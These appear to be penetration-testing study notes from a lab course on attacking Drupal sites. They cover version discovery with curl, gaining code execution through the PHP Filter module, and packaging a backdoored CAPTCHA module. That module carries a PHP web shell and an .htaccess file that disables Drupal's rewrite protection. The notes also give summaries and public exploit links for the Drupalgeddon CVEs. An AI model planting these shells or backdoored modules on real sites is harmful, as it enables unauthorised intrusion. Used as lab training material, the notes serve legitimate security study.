Drupal

Newer installs of Drupal block access to the CHANGELOG.txt and README.txt files by default, so the version check in the Discovery section may return nothing on a current install.

Drupal supports three types of users by default:

  1. Administrator: This user has complete control over the Drupal website.

  2. Authenticated User: These users can log in to the website and perform operations such as adding and editing articles based on their permissions.

  3. Anonymous: All website visitors are designated as anonymous. By default, these users are only allowed to read posts.

Discovery/Footprinting

#Verify Drupal on web server
Intrusionz3r0@htb[/htb]$ curl -s http://drupal.inlanefreight.local | grep Drupal

#Node: Drupal indexes its content using nodes. A node can hold anything such as a blog post, poll, article, etc. The page URIs are usually of the form /node/<nodeid>.
Intrusionz3r0@htb[/htb]$ curl -s http://drupal.inlanefreight.local/node/1

#uncover the version: the first line of CHANGELOG.txt names the installed release (e.g. "Drupal 7.30, ..."); grep -m2 "" prints the first two lines
Intrusionz3r0@htb[/htb]$ curl -s http://drupal-acc.inlanefreight.local/CHANGELOG.txt | grep -m2 ""

Attacking Drupal

PHP Filter Module

💡

In older versions of Drupal (before version 8), it was possible to log in as an admin and enable the PHP filter module, which "Allows embedded PHP code/snippets to be evaluated." But from version 8 this module is not installed by default.

  • Go to Modules -> (Check) PHP Filter -> Save configuration

  • Then click on Add content -> Select Basic Page or Article -> Write a PHP web shell in the body -> Select PHP code in Text format -> Select Preview. The PHP in the body is evaluated whenever the node is rendered, so requesting the node URL with the shell's GET parameter runs the command:

Intrusionz3r0@htb[/htb]$ curl -s 'http://drupal-qa.inlanefreight.local/node/3?4e3fxxxxxxxcd39ff=id'

PHP Filter Module from version 8 onwards

💡

From version 8 onwards, the PHP Filter module is not installed by default. To leverage this functionality, we would have to install the module ourselves.

  1. Download the most recent version of the module from the Drupal website:

     wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

  2. Once downloaded, go to Administration > Reports > Available updates:

     /admin/reports/updates/install

  3. Click on **Browse**, select the file from the directory we downloaded it to, and then click Install.

  4. Once the module is installed, go to Content (/admin/content) and create a new basic page, similar to how we did in the Drupal 7 example. Again, be sure to select PHP code from the Text format dropdown.

Uploading a Backdoored Module

💡

On current versions, a default installation no longer lets you install modules through the web interface alone.

A backdoored module can be created by adding a shell to an existing module. Modules can be found on the drupal.org website. Let's pick a module such as CAPTCHA. Scroll down and copy the link for the tar.gz archive.

Download the archive and extract its contents.

wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz

Create a PHP web shell named shell.php with the following contents:

<?php
system($_GET["cmd"]);
?>

Create a .htaccess file alongside it. This is necessary because Drupal's root .htaccess uses a mod_rewrite rule to refuse direct requests to PHP files in subdirectories such as /modules. Per-directory rewrite rules are not inherited by a subdirectory whose own .htaccess declares RewriteEngine On (unless RewriteOptions Inherit is set), so this file effectively switches that rule off for the module folder:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

With this in place, requests for files inside the module folder are handled without the root folder's rewrite rules, so shell.php is served directly instead of being rejected. Copy both files into the captcha folder and create a gzip-compressed archive (the z flag matters: a plain tar named .tar.gz is not what the name claims):

mv shell.php .htaccess captcha
tar czvf captcha.tar.gz captcha/

Click on Manage -> Extend -> + Install new module, upload captcha.tar.gz and install it. The archive is unpacked under /modules, so once the module is installed the shell is reachable at /modules/captcha/shell.php?cmd=id.

Leveraging Known Vulnerabilities

Drupalgeddon

  • CVE-2014-3704, known as Drupalgeddon, affects versions 7.0 up to 7.31 and was fixed in version 7.32. This was an unauthenticated SQL injection flaw in the database abstraction layer's handling of array parameters, which could be used to upload a malicious form or create a new admin user.

    • https://www.exploit-db.com/exploits/34992

Drupalgeddon2

  • CVE-2018-7600, also known as Drupalgeddon2, is an unauthenticated remote code execution vulnerability affecting Drupal versions prior to 7.58 and 8.5.1 (with backported fixes in 8.3.9 and 8.4.6). It stems from the Form API accepting attacker-supplied render-array keys (those beginning with #) in request parameters; the public exploits reach this through the user registration form, so no account is needed.

    • https://www.exploit-db.com/exploits/44448

Drupalgeddon3

  • CVE-2018-7602, also known as Drupalgeddon3, is a remote code execution vulnerability that affects multiple versions of Drupal 7.x and 8.x (fixed in 7.59, 8.4.8 and 8.5.3). It is a second flaw in the same Form API render-array handling, but unlike Drupalgeddon2 it requires an authenticated account with permission to delete a node: the public exploits abuse the destination parameter of the node deletion form.

    • https://github.com/rithchard/Drupalgeddon3

    • https://github.com/oways/SA-CORE-2018-004/blob/master/drupalgeddon3.py
